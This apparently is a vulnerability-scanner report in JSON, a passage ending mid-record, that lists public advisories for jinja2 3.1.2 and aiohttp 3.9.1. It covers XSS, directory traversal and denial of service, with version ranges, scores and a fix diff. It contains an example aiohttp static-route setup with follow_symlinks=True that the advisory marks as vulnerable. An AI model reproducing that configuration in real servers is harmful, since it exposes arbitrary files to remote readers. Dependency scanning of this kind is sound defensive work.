{
  "results": [
    {
      "source": {
        "path": "/home/ooe/sbom_scanning/data_1716484155/sbom_files/0bldlojcvbw6wpmuml4n.json",
        "type": "sbom"
      },
      "packages": [
        {
          "package": {
            "name": "jinja2",
            "version": "3.1.2",
            "ecosystem": "PyPI"
          },
          "vulnerabilities": [
            {
              "modified": "2024-02-16T08:18:43Z",
              "published": "2024-01-11T15:20:48Z",
              "schema_version": "1.6.0",
              "id": "GHSA-h5c8-rqwp-cp95",
              "aliases": [
                "CVE-2024-22195"
              ],
              "summary": "Jinja vulnerable to HTML attribute injection when passing user input as keys to xmlattr filter",
              "details": "The `xmlattr` filter in affected versions of Jinja accepts keys containing spaces. XML/HTML attributes cannot contain spaces, as each would then be interpreted as a separate attribute. If an application accepts keys (as opposed to only values) as user input, and renders these in pages that other users see as well, an attacker could use this to inject other attributes and perform XSS. Note that accepting keys as user input is not common or a particularly intended use case of the `xmlattr` filter, and an application doing so should already be verifying what keys are provided regardless of this fix.",
              "affected": [
                {
                  "package": {
                    "ecosystem": "PyPI",
                    "name": "jinja2",
                    "purl": "pkg:pypi/jinja2"
                  },
                  "ranges": [
                    {
                      "type": "ECOSYSTEM",
                      "events": [
                        {
                          "introduced": "0"
                        },
                        {
                          "fixed": "3.1.3"
                        }
                      ]
                    }
                  ],
                  "versions": [
                    "2.0",
                    "2.0rc1",
                    "2.1",
                    "2.1.1",
                    "2.10",
                    "2.10.1",
                    "2.10.2",
                    "2.10.3",
                    "2.11.0",
                    "2.11.1",
                    "2.11.2",
                    "2.11.3",
                    "2.2",
                    "2.2.1",
                    "2.3",
                    "2.3.1",
                    "2.4",
                    "2.4.1",
                    "2.5",
                    "2.5.1",
                    "2.5.2",
                    "2.5.3",
                    "2.5.4",
                    "2.5.5",
                    "2.6",
                    "2.7",
                    "2.7.1",
                    "2.7.2",
                    "2.7.3",
                    "2.8",
                    "2.8.1",
                    "2.9",
                    "2.9.1",
                    "2.9.2",
                    "2.9.3",
                    "2.9.4",
                    "2.9.5",
                    "2.9.6",
                    "3.0.0",
                    "3.0.0a1",
                    "3.0.0rc1",
                    "3.0.0rc2",
                    "3.0.1",
                    "3.0.2",
                    "3.0.3",
                    "3.1.0",
                    "3.1.1",
                    "3.1.2"
                  ],
                  "database_specific": {
                    "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/01/GHSA-h5c8-rqwp-cp95/GHSA-h5c8-rqwp-cp95.json"
                  }
                }
              ],
              "severity": [
                {
                  "type": "CVSS_V3",
                  "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"
                }
              ],
              "references": [
                {
                  "type": "WEB",
                  "url": "https://github.com/pallets/jinja/security/advisories/GHSA-h5c8-rqwp-cp95"
                },
                {
                  "type": "ADVISORY",
                  "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22195"
                },
                {
                  "type": "WEB",
                  "url": "https://github.com/pallets/jinja/commit/716795349a41d4983a9a4771f7d883c96ea17be7"
                },
                {
                  "type": "PACKAGE",
                  "url": "https://github.com/pallets/jinja"
                },
                {
                  "type": "WEB",
                  "url": "https://github.com/pallets/jinja/releases/tag/3.1.3"
                },
                {
                  "type": "WEB",
                  "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00010.html"
                },
                {
                  "type": "WEB",
                  "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5XCWZD464AJJJUBOO7CMPXQ4ROBC6JX2"
                },
                {
                  "type": "WEB",
                  "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DELCVUUYX75I5K4Q5WMJG4MUZJA6VAIP"
                },
                {
                  "type": "WEB",
                  "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/O7YWRBX6JQCWC2XXCTZ55C7DPMGICCN3"
                }
              ],
              "database_specific": {
                "cwe_ids": [
                  "CWE-79"
                ],
                "github_reviewed": true,
                "github_reviewed_at": "2024-01-11T15:20:48Z",
                "nvd_published_at": "2024-01-11T03:15:11Z",
                "severity": "MODERATE"
              }
            },
            {
              "modified": "2024-05-06T16:34:48Z",
              "published": "2024-05-06T14:20:59Z",
              "schema_version": "1.6.0",
              "id": "GHSA-h75v-3vvj-5mfj",
              "aliases": [
                "CVE-2024-34064"
              ],
              "summary": "Jinja vulnerable to HTML attribute injection when passing user input as keys to xmlattr filter",
              "details": "The `xmlattr` filter in affected versions of Jinja accepts keys containing non-attribute characters. XML/HTML attributes cannot contain spaces, `/`, `\u003e`, or `=`, as each would then be interpreted as starting a separate attribute. If an application accepts keys (as opposed to only values) as user input, and renders these in pages that other users see as well, an attacker could use this to inject other attributes and perform XSS. The fix for the previous GHSA-h5c8-rqwp-cp95 CVE-2024-22195 only addressed spaces but not other characters.\n\nAccepting keys as user input is now explicitly considered an unintended use case of the `xmlattr` filter, and code that does so without otherwise validating the input should be flagged as insecure, regardless of Jinja version. Accepting _values_ as user input continues to be safe.",
              "affected": [
                {
                  "package": {
                    "ecosystem": "PyPI",
                    "name": "jinja2",
                    "purl": "pkg:pypi/jinja2"
                  },
                  "ranges": [
                    {
                      "type": "ECOSYSTEM",
                      "events": [
                        {
                          "introduced": "0"
                        },
                        {
                          "fixed": "3.1.4"
                        }
                      ]
                    }
                  ],
                  "versions": [
                    "2.0",
                    "2.0rc1",
                    "2.1",
                    "2.1.1",
                    "2.10",
                    "2.10.1",
                    "2.10.2",
                    "2.10.3",
                    "2.11.0",
                    "2.11.1",
                    "2.11.2",
                    "2.11.3",
                    "2.2",
                    "2.2.1",
                    "2.3",
                    "2.3.1",
                    "2.4",
                    "2.4.1",
                    "2.5",
                    "2.5.1",
                    "2.5.2",
                    "2.5.3",
                    "2.5.4",
                    "2.5.5",
                    "2.6",
                    "2.7",
                    "2.7.1",
                    "2.7.2",
                    "2.7.3",
                    "2.8",
                    "2.8.1",
                    "2.9",
                    "2.9.1",
                    "2.9.2",
                    "2.9.3",
                    "2.9.4",
                    "2.9.5",
                    "2.9.6",
                    "3.0.0",
                    "3.0.0a1",
                    "3.0.0rc1",
                    "3.0.0rc2",
                    "3.0.1",
                    "3.0.2",
                    "3.0.3",
                    "3.1.0",
                    "3.1.1",
                    "3.1.2",
                    "3.1.3"
                  ],
                  "database_specific": {
                    "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-h75v-3vvj-5mfj/GHSA-h75v-3vvj-5mfj.json"
                  }
                }
              ],
              "severity": [
                {
                  "type": "CVSS_V3",
                  "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"
                }
              ],
              "references": [
                {
                  "type": "WEB",
                  "url": "https://github.com/pallets/jinja/security/advisories/GHSA-h75v-3vvj-5mfj"
                },
                {
                  "type": "ADVISORY",
                  "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34064"
                },
                {
                  "type": "WEB",
                  "url": "https://github.com/pallets/jinja/commit/0668239dc6b44ef38e7a6c9f91f312fd4ca581cb"
                },
                {
                  "type": "PACKAGE",
                  "url": "https://github.com/pallets/jinja"
                }
              ],
              "database_specific": {
                "cwe_ids": [
                  "CWE-79"
                ],
                "github_reviewed": true,
                "github_reviewed_at": "2024-05-06T14:20:59Z",
                "nvd_published_at": "2024-05-06T15:15:23Z",
                "severity": "MODERATE"
              }
            }
          ],
          "groups": [
            {
              "ids": [
                "GHSA-h5c8-rqwp-cp95"
              ],
              "aliases": [
                "CVE-2024-22195",
                "GHSA-h5c8-rqwp-cp95"
              ],
              "max_severity": "5.4"
            },
            {
              "ids": [
                "GHSA-h75v-3vvj-5mfj"
              ],
              "aliases": [
                "CVE-2024-34064",
                "GHSA-h75v-3vvj-5mfj"
              ],
              "max_severity": "5.4"
            }
          ]
        },
        {
          "package": {
            "name": "aiohttp",
            "version": "3.9.1",
            "ecosystem": "PyPI"
          },
          "vulnerabilities": [
            {
              "modified": "2024-02-18T05:33:41Z",
              "published": "2024-01-29T22:31:03Z",
              "schema_version": "1.6.0",
              "id": "GHSA-5h86-8mv2-jq9f",
              "aliases": [
                "CVE-2024-23334",
                "PYSEC-2024-24"
              ],
              "summary": "aiohttp is vulnerable to directory traversal",
              "details": "### Summary\nImproperly configuring static resource resolution in aiohttp when used as a web server can result in the unauthorized reading of arbitrary files on the system.\n\n### Details\nWhen using aiohttp as a web server and configuring static routes, it is necessary to specify the root path for static files. Additionally, the option 'follow_symlinks' can be used to determine whether to follow symbolic links outside the static root directory. When 'follow_symlinks' is set to True, there is no validation to check if a given file path is within the root directory.This can lead to directory traversal vulnerabilities, resulting in unauthorized access to arbitrary files on the system, even when symlinks are not present.\n\ni.e. An application is only vulnerable with setup code like:\n```\napp.router.add_routes([\n    web.static(\"/static\", \"static/\", follow_symlinks=True),  # Remove follow_symlinks to avoid the vulnerability\n])\n```\n\n### Impact\nThis is a directory traversal vulnerability with CWE ID 22. When using aiohttp as a web server and enabling static resource resolution with `follow_symlinks` set to True, it can lead to this vulnerability. This vulnerability has been present since the introduction of the `follow_symlinks` parameter.\n\n### Workaround\nEven if upgrading to a patched version of aiohttp, we recommend following these steps regardless.\n\nIf using `follow_symlinks=True` outside of a restricted local development environment, disable the option immediately. This option is NOT needed to follow symlinks which point to a location _within_ the static root directory, it is _only_ intended to allow a symlink to break out of the static directory. Even with this CVE fixed, there is still a substantial risk of misconfiguration when using this option on a server that accepts requests from remote users.\n\nAdditionally, aiohttp has always recommended using a reverse proxy server (such as nginx) to handle static resources and _not_ to use these static resources in aiohttp for production environments. Doing so also protects against this vulnerability, and is why we expect the number of affected users to be very low.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/pull/8079/files",
              "affected": [
                {
                  "package": {
                    "ecosystem": "PyPI",
                    "name": "aiohttp",
                    "purl": "pkg:pypi/aiohttp"
                  },
                  "ranges": [
                    {
                      "type": "ECOSYSTEM",
                      "events": [
                        {
                          "introduced": "1.0.5"
                        },
                        {
                          "fixed": "3.9.2"
                        }
                      ]
                    }
                  ],
                  "versions": [
                    "1.0.5",
                    "1.1.0",
                    "1.1.1",
                    "1.1.2",
                    "1.1.3",
                    "1.1.4",
                    "1.1.5",
                    "1.1.6",
                    "1.2.0",
                    "1.3.0",
                    "1.3.1",
                    "1.3.2",
                    "1.3.3",
                    "1.3.4",
                    "1.3.5",
                    "2.0.0",
                    "2.0.0rc1",
                    "2.0.1",
                    "2.0.2",
                    "2.0.3",
                    "2.0.4",
                    "2.0.5",
                    "2.0.6",
                    "2.0.7",
                    "2.1.0",
                    "2.2.0",
                    "2.2.1",
                    "2.2.2",
                    "2.2.3",
                    "2.2.4",
                    "2.2.5",
                    "2.3.0",
                    "2.3.0a1",
                    "2.3.0a2",
                    "2.3.0a3",
                    "2.3.0a4",
                    "2.3.1",
                    "2.3.10",
                    "2.3.1a1",
                    "2.3.2",
                    "2.3.2b2",
                    "2.3.2b3",
                    "2.3.3",
                    "2.3.4",
                    "2.3.5",
                    "2.3.6",
                    "2.3.7",
                    "2.3.8",
                    "2.3.9",
                    "3.0.0",
                    "3.0.0b0",
                    "3.0.0b1",
                    "3.0.0b2",
                    "3.0.0b3",
                    "3.0.0b4",
                    "3.0.1",
                    "3.0.2",
                    "3.0.3",
                    "3.0.4",
                    "3.0.5",
                    "3.0.6",
                    "3.0.7",
                    "3.0.8",
                    "3.0.9",
                    "3.1.0",
                    "3.1.1",
                    "3.1.2",
                    "3.1.3",
                    "3.2.0",
                    "3.2.1",
                    "3.3.0",
                    "3.3.0a0",
                    "3.3.1",
                    "3.3.2",
                    "3.3.2a0",
                    "3.4.0",
                    "3.4.0a0",
                    "3.4.0a3",
                    "3.4.0b1",
                    "3.4.0b2",
                    "3.4.1",
                    "3.4.2",
                    "3.4.3",
                    "3.4.4",
                    "3.5.0",
                    "3.5.0a1",
                    "3.5.0b1",
                    "3.5.0b2",
                    "3.5.0b3",
                    "3.5.1",
                    "3.5.2",
                    "3.5.3",
                    "3.5.4",
                    "3.6.0",
                    "3.6.0a0",
                    "3.6.0a1",
                    "3.6.0a11",
                    "3.6.0a12",
                    "3.6.0a2",
                    "3.6.0a3",
                    "3.6.0a4",
                    "3.6.0a5",
                    "3.6.0a6",
                    "3.6.0a7",
                    "3.6.0a8",
                    "3.6.0a9",
                    "3.6.0b0",
                    "3.6.1",
                    "3.6.1b3",
                    "3.6.1b4",
                    "3.6.2",
                    "3.6.2a0",
                    "3.6.2a1",
                    "3.6.2a2",
                    "3.6.3",
                    "3.7.0",
                    "3.7.0b0",
                    "3.7.0b1",
                    "3.7.1",
                    "3.7.2",
                    "3.7.3",
                    "3.7.4",
                    "3.7.4.post0",
                    "3.8.0",
                    "3.8.0a7",
                    "3.8.0b0",
                    "3.8.1",
                    "3.8.2",
                    "3.8.3",
                    "3.8.4",
                    "3.8.5",
                    "3.8.6",
                    "3.9.0",
                    "3.9.0b0",
                    "3.9.0b1",
                    "3.9.0rc0",
                    "3.9.1"
                  ],
                  "database_specific": {
                    "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/01/GHSA-5h86-8mv2-jq9f/GHSA-5h86-8mv2-jq9f.json"
                  }
                }
              ],
              "severity": [
                {
                  "type": "CVSS_V3",
                  "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
                }
              ],
              "references": [
                {
                  "type": "WEB",
                  "url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-5h86-8mv2-jq9f"
                },
                {
                  "type": "ADVISORY",
                  "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23334"
                },
                {
                  "type": "WEB",
                  "url": "https://github.com/aio-libs/aiohttp/pull/8079"
                },
                {
                  "type": "WEB",
                  "url": "https://github.com/aio-libs/aiohttp/pull/8079/files"
                },
                {
                  "type": "WEB",
                  "url": "https://github.com/aio-libs/aiohttp/commit/1c335944d6a8b1298baf179b7c0b3069f10c514b"
                },
                {
                  "type": "PACKAGE",
                  "url": "https://github.com/aio-libs/aiohttp"
                },
                {
                  "type": "WEB",
                  "url": "https://github.com/pypa/advisory-database/tree/main/vulns/aiohttp/PYSEC-2024-24.yaml"
                },
                {
                  "type": "WEB",
                  "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ICUOCFGTB25WUT336BZ4UNYLSZOUVKBD"
                },
                {
                  "type": "WEB",
                  "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XXWVZIVAYWEBHNRIILZVB3R3SDQNNAA7"
                }
              ],
              "database_specific": {
                "cwe_ids": [
                  "CWE-22"
                ],
                "github_reviewed": true,
                "github_reviewed_at": "2024-01-29T22:31:03Z",
                "nvd_published_at": "2024-01-29T23:15:08Z",
                "severity": "MODERATE"
              }
            },
            {
              "modified": "2024-05-03T18:02:59Z",
              "published": "2024-05-03T17:29:54Z",
              "schema_version": "1.6.0",
              "id": "GHSA-5m98-qgg9-wh84",
              "aliases": [
                "CVE-2024-30251"
              ],
              "summary": "aiohttp vulnerable to Denial of Service when trying to parse malformed POST requests",
              "details": "### Summary\nAn attacker can send a specially crafted POST (multipart/form-data) request. When the aiohttp server processes it, the server will enter an infinite loop and be unable to process any further requests.\n\n### Impact\nAn attacker can stop the application from serving requests after sending a single request.\n\n-------\n\nFor anyone needing to patch older versions of aiohttp, the minimum diff needed to resolve the issue is (located in `_read_chunk_from_length()`):\n\n```diff\ndiff --git a/aiohttp/multipart.py b/aiohttp/multipart.py\nindex 227be605c..71fc2654a 100644\n--- a/aiohttp/multipart.py\n+++ b/aiohttp/multipart.py\n@@ -338,6 +338,8 @@ class BodyPartReader:\n         assert self._length is not None, \"Content-Length required for chunked read\"\n         chunk_size = min(size, self._length - self._read_bytes)\n         chunk = await self._content.read(chunk_size)\n+        if self._content.at_eof():\n+            self._at_eof = True\n         return chunk\n \n     async def _read_chunk_from_stream(self, size: int) -\u003e bytes:\n```\n\nThis does however introduce some very minor issues with handling form data. So, if possible, it would be recommended to also backport the changes in:\nhttps://github.com/aio-libs/aiohttp/commit/cebe526b9c34dc3a3da9140409db63014bc4cf19\nhttps://github.com/aio-libs/aiohttp/commit/7eecdff163ccf029fbb1ddc9de4169d4aaeb6597\nhttps://github.com/aio-libs/aiohttp/commit/f21c6f2ca512a026ce7f0f6c6311f62d6a638866",
              "affected": [
                {
                  "package": {
                    "ecosystem": "PyPI",
                    "name": "aiohttp",
                    "purl": "pkg:pypi/aiohttp"
                  },
                  "ranges": [
                    {
                      "type": "ECOSYSTEM",
                      "events": [
                        {
                          "introduced": "0"
                        },
                        {
                          "fixed": "3.9.4"
                        }
                      ]
                    }
                  ],
                  "versions": [
                    "0.1",
                    "0.10.0",
                    "0.10.1",
                    "0.10.2",
                    "0.11.0",
                    "0.12.0",
                    "0.13.0",
                    "0.13.1",
                    "0.14.0",
                    "0.14.1",
                    "0.14.2",
                    "0.14.3",
                    "0.14.4",
                    "0.15.0",
                    "0.15.1",
                    "0.15.2",
                    "0.15.3",
                    "0.16.0",
                    "0.16.1",
                    "0.16.2",
                    "0.16.3",
                    "0.16.4",
                    "0.16.5",
                    "0.16.6",
                    "0.17.0",
                    "0.17.1",
                    "0.17.2",
                    "0.17.3",
                    "0.17.4",
                    "0.18.0",
                    "0.18.1",
                    "0.18.2",
                    "0.18.3",
                    "0.18.4",
                    "0.19.0",
                    "0.2",
                    "0.20.0",
                    "0.20.1",
                    "0.20.2",
                    "0.21.0",
                    "0.21.1",
                    "0.21.2",
                    "0.21.4",
                    "0.21.5",
                    "0.21.6",
                    "0.22.0",
                    "0.22.0a0",
                    "0.22.0b0",
                    "0.22.0b1",
                    "0.22.0b2",
                    "0.22.0b3",
                    "0.22.0b4",
                    "0.22.0b5",
                    "0.22.0b6",
                    "0.22.1",
                    "0.22.2",
                    "0.22.3",
                    "0.22.4",
                    "0.22.5",
                    "0.3",
                    "0.4",
                    "0.4.1",
                    "0.4.2",
                    "0.4.3",
                    "0.4.4",
                    "0.5.0",
                    "0.6.0",
                    "0.6.1",
                    "0.6.2",
                    "0.6.3",
                    "0.6.4",
                    "0.6.5",
                    "0.7.0",
                    "0.7.1",
                    "0.7.2",
                    "0.7.3",
                    "0.8.0",
                    "0.8.1",
                    "0.8.2",
                    "0.8.3",
                    "0.8.4",
                    "0.9.0",
                    "0.9.1",
                    "0.9.2",
                    "0.9.3",
                    "1.0.0",
                    "1.0.1",
                    "1.0.2",
                    "1.0.3",
                    "1.0.5",
                    "1.1.0",
                    "1.1.1",
                    "1.1.2",
                    "1.1.3",
                    "1.1.4",
                    "1.1.5",
                    "1.1.6",
                    "1.2.0",
                    "1.3.0",
                    "1.3.1",
                    "1.3.2",
                    "1.3.3",
                    "1.3.4",
                    "1.3.5",
                    "2.0.0",
                    "2.0.0rc1",
                    "2.0.1",
                    "2.0.2",
                    "2.0.3",
                    "2.0.4",
                    "2.0.5",
                    "2.0.6",
                    "2.0.7",
                    "2.1.0",
                    "2.2.0",
                    "2.2.1",
                    "2.2.2",
                    "2.2.3",
                    "2.2.4",
                    "2.2.5",
                    "2.3.0",
                    "2.3.0a1",
                    "2.3.0a2",
                    "2.3.0a3",
                    "2.3.0a4",
                    "2.3.1",
                    "2.3.10",
                    "2.3.1a1",
                    "2.3.2",
                    "2.3.2b2",
                    "2.3.2b3",
                    "2.3.3",
                    "2.3.4",
                    "2.3.5",
                    "2.3.6",
                    "2.3.7",
                    "2.3.8",
                    "2.3.9",
                    "3.0.0",
                    "3.0.0b0",
                    "3.0.0b1",
                    "3.0.0b2",
                    "3.0.0b3",
                    "3.0.0b4",
                    "3.0.1",
                    "3.0.2",
                    "3.0.3",
                    "3.0.4",
                    "3.0.5",
                    "3.0.6",
                    "3.0.7",
                    "3.0.8",
                    "3.0.9",
                    "3.1.0",
                    "3.1.1",
                    "3.1.2",
                    "3.1.3",
                    "3.2.0",
                    "3.2.1",
                    "3.3.0",
                    "3.3.0a0",
                    "3.3.1",
                    "3.3.2",
                    "3.3.2a0",
                    "3.4.0",
                    "3.4.0a0",
                    "3.4.0a3",
                    "3.4.0b1",
                    "3.4.0b2",
                    "3.4.1",
                    "3.4.2",
                    "3.4.3",
                    "3.4.4",
                    "3.5.0",
                    "3.5.0a1",
                    "3.5.0b1",
                    "3.5.0b2",
                    "3.5.0b3",
                    "3.5.1",
                    "3.5.2",
                    "3.5.3",
                    "3.5.4",
                    "3.6.0",
                    "3.6.0a0",
                    "3.6.0a1",
                    "3.6.0a11",
                    "3.6.0a12",
                    "3.6.0a2",
                    "3.6.0a3",
                    "3.6.0a4",
                    "3.6.0a5",
                    "3.6.0a6",
                    "3.6.0a7",
                    "3.6.0a8",
                    "3.6.0a9",
                    "3.6.0b0",
                    "3.6.1",
                    "3.6.1b3",
                    "3.6.1b4",
                    "3.6.2",
                    "3.6.2a0",
                    "3.6.2a1",
                    "3.6.2a2",
                    "3.6.3",
                    "3.7.0",
                    "3.7.0b0",
                    "3.7.0b1",
                    "3.7.1",
                    "3.7.2",
                    "3.7.3",
                    "3.7.4",
                    "3.7.4.post0",
                    "3.8.0",
                    "3.8.0a7",
                    "3.8.0b0",
                    "3.8.1",
                    "3.8.2",
                    "3.8.3",
                    "3.8.4",
                    "3.8.5",
                    "3.8.6",
                    "3.9.0",
                    "3.9.0b0",
                    "3.9.0b1",
                    "3.9.0rc0",
                    "3.9.1",
                    "3.9.2",
                    "3.9.3",
                    "3.9.4rc0"
                  ],
                  "database_specific": {
                    "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-5m98-qgg9-wh84/GHSA-5m98-qgg9-wh84.json"
                  }
                }
              ],
              "severity": [
                {
                  "type": "CVSS_V3",
                  "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                }
              ],
              "references": [
                {
                  "type": "WEB",
                  "url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-5m98-qgg9-wh84"
                },
                {
                  "type": "ADVISORY",
                  "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30251"
                },
                {
                  "type": "WEB",
                  "url": "https://github.com/aio-libs/aiohttp/commit/7eecdff163ccf029fbb1ddc9de4169d4aaeb6597"
                },
                {
                  "type": "WEB",
                  "url": "https://github.com/aio-libs/aiohttp/commit/cebe526b9c34dc3a3da9140409db63014bc4cf19"
                },
                {
                  "type": "WEB",
                  "url": "https://github.com/aio-libs/aiohttp/commit/f21c6f2ca512a026ce7f0f6c6311f62d6a638866"
                },
                {
                  "type": "PACKAGE",
                  "url": "https://github.com/aio-libs/aiohttp"
                },
                {
                  "type": "WEB",
                  "url": "http://www.openwall.com/lists/oss-security/2024/05/02/4"
                }
              ],
              "database_specific": {
                "cwe_ids": [
                  "CWE-835"
                ],
                "github_reviewed": true,
                "github_reviewed_at": "2024-05-03T17:29:54Z",
                "nvd_published_at": "2024-05-02T14:15:09Z",
                "severity": "HIGH"
              }
            },
            {
              "modified": "2024-05-02T03:49:07Z",
              "published": "2024-04-18T13:45:21Z",
              "schema_version": "1.6.0",
              "id": "GHSA-7gpw-8wmc-pm8g",
              "aliases": [
                "CVE-2024-27306"
              ],
              "summary": "aiohttp Cross-site Scripting vulnerability on index pages for static file handling",
              "details": "### Summary\n\nA XSS vulnerability exists on index pages for static file handling.\n\n### Details\n\nWhen using `web.static(..., show_index=True)`, the resulting index pages do not escape file names.\n\nIf users can upload files with arbitrary filenames to the static directory, the server is vulnerable to XSS attacks.\n\n### Workaround\n\nWe have always recommended using a reverse proxy server (e.g. nginx) for serving static files. Users following the recommendation are unaffected.\n\nOther users can disable `show_index` if unable to upgrade.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/pull/8319/files",
              "affected": [
                {
                  "package": {
                    "ecosystem": "PyPI",
                    "name": "aiohttp",
                    "purl": "pkg:pypi/aiohttp"
                  },
                  "ranges": [
                    {
                      "type": "ECOSYSTEM",
                      "events": [
                        {
                          "introduced": "0"
                        },
                        {
                          "fixed": "3.9.4"
                        }
                      ]
                    }
                  ],
                  "versions": [
                    "0.1",
                    "0.10.0",
                    "0.10.1",
                    "0.10.2",
                    "0.11.0",
                    "0.12.0",
                    "0.13.0",
                    "0.13.1",
                    "0.14.0",
                    "0.14.1",
                    "0.14.2",
                    "0.14.3",
                    "0.14.4",
                    "0.15.0",
                    "0.15.1",
                    "0.15.2",
                    "0.15.3",
                    "0.16.0",
                    "0.16.1",
                    "0.16.2",
                    "0.16.3",
                    "0.16.4",
                    "0.16.5",
                    "0.16.6",
                    "0.17.0",
                    "0.17.1",
                    "0.17.2",
                    "0.17.3",
                    "0.17.4",
                    "0.18.0",
                    "0.18.1",
                    "0.18.2",
                    "0.18.3",
                    "0.18.4",
                    "0.19.0",
                    "0.2",
                    "0.20.0",
                    "0.20.1",
                    "0.20.2",
                    "0.21.0",
                    "0.21.1",
                    "0.21.2",
                    "0.21.4",
                    "0.21.5",
                    "0.21.6",
                    "0.22.0",
                    "0.22.0a0",
                    "0.22.0b0",
                    "0.22.0b1",
                    "0.22.0b2",
                    "0.22.0b3",
                    "0.22.0b4",
                    "0.22.0b5",
                    "0.22.0b6",
                    "0.22.1",
                    "0.22.2",
                    "0.22.3",
                    "0.22.4",
                    "0.22.5",
                    "0.3",
                    "0.4",
                    "0.4.1",
                    "0.4.2",
                    "0.4.3",
                    "0.4.4",
                    "0.5.0",
                    "0.6.0",
                    "0.6.1",
                    "0.6.2",
                    "0.6.3",
                    "0.6.4",
                    "0.6.5",
                    "0.7.0",
                    "0.7.1",
                    "0.7.2",
                    "0.7.3",
                    "0.8.0",
                    "0.8.1",
                    "0.8.2",
                    "0.8.3",
                    "0.8.4",
                    "0.9.0",
                    "0.9.1",
                    "0.9.2",
                    "0.9.3",
                    "1.0.0",
                    "1.0.1",
                    "1.0.2",
                    "1.0.3",
                    "1.0.5",
                    "1.1.0",
                    "1.1.1",
                    "1.1.2",
                    "1.1.3",
                    "1.1.4",
                    "1.1.5",
                    "1.1.6",
                    "1.2.0",
                    "1.3.0",
                    "1.3.1",
                    "1.3.2",
                    "1.3.3",
                    "1.3.4",
                    "1.3.5",
                    "2.0.0",
                    "2.0.0rc1",
                    "2.0.1",
                    "2.0.2",
                    "2.0.3",
                    "2.0.4",
                    "2.0.5",
                    "2.0.6",
                    "2.0.7",
                    "2.1.0",
                    "2.2.0",
                    "2.2.1",
                    "2.2.2",
                    "2.2.3",
                    "2.2.4",
                    "2.2.5",
                    "2.3.0",
                    "2.3.0a1",
                    "2.3.0a2",
                    "2.3.0a3",
                    "2.3.0a4",
                    "2.3.1",
                    "2.3.10",
                    "2.3.1a1",
                    "2.3.2",
                    "2.3.2b2",
                    "2.3.2b3",
                    "2.3.3",
                    "2.3.4",
                    "2.3.5",
                    "2.3.6",
                    "2.3.7",
                    "2.3.8",
                    "2.3.9",
                    "3.0.0",
                    "3.0.0b0",
                    "3.0.0b1",
                    "3.0.0b2",
                    "3.0.0b3",
                    "3.0.0b4",
                    "3.0.1",
                    "3.0.2",
                    "3.0.3",
                    "3.0.4",
                    "3.0.5",
                    "3.0.6",
                    "3.0.7",
                    "3.0.8",
                    "3.0.9",
                    "3.1.0",
                    "3.1.1",
                    "3.1.2",
                    "3.1.3",
                    "3.2.0",
                    "3.2.1",
                    "3.3.0",
                    "3.3.0a0",
                    "3.3.1",
                    "3.3.2",
                    "3.3.2a0",
                    "3.4.0",
                    "3.4.0a0",
                    "3.4.0a3",
                    "3.4.0b1",
                    "3.4.0b2",
                    "3.4.1",
                    "3.4.2",
                    "3.4.3",
                    "3.4.4",
                    "3.5.0",
                    "3.5.0a1",
                    "3.5.0b1",
                    "3.5.0b2",
                    "3.5.0b3",
                    "3.5.1",
                    "3.5.2",
                    "3.5.3",
                    "3.5.4",
                    "3.6.0",
                    "3.6.0a0",
                    "3.6.0a1",
                    "3.6.0a11",
                    "3.6.0a12",
                    "3.6.0a2",
                    "3.6.0a3",
                    "3.6.0a4",
                    "3.6.0a5",
                    "3.6.0a6",
                    "3.6.0a7",
                    "3.6.0a8",
                    "3.6.0a9",
                    "3.6.0b0",
                    "3.6.1",
                    "3.6.1b3",
                    "3.6.1b4",
                    "3.6.2",
                    "3.6.2a0",
                    "3.6.2a1",
                    "3.6.2a2",
                    "3.6.3",
                    "3.7.0",
                    "3.7.0b0",
                    "3.7.0b1",
                    "3.7.1",
                    "3.7.2",
                    "3.7.3",
                    "3.7.4",
                    "3.7.4.post0",
                    "3.8.0",
                    "3.8.0a7",
                    "3.8.0b0",
                    "3.8.1",
                    "3.8.2",
                    "3.8.3",
                    "3.8.4",
                    "3.8.5",
                    "3.8.6",
                    "3.9.0",
                    "3.9.0b0",
                    "3.9.0b1",
                    "3.9.0rc0",
                    "3.9.1",
                    "3.9.2",
                    "3.9.3",
                    "3.9.4rc0"
                  ],
                  "database_specific": {
                    "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/04/GHSA-7gpw-8wmc-pm8g/GHSA-7gpw-8wmc-pm8g.json"
                  }
                }
              ],
              "severity": [
                {
                  "type": "CVSS_V3",
                  "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                }
              ],
              "references": [
                {
                  "type": "WEB",
                  "url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-7gpw-8wmc-pm8g"
                },
                {
                  "type": "ADVISORY",
                  "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27306"
                },
                {
                  "type": "WEB",
                  "url": "https://github.com/aio-libs/aiohttp/pull/8319"
                },
                {
                  "type": "WEB",
                  "url": "https://github.com/aio-libs/aiohttp/pull/8319/files"
                },
                {
                  "type": "WEB",
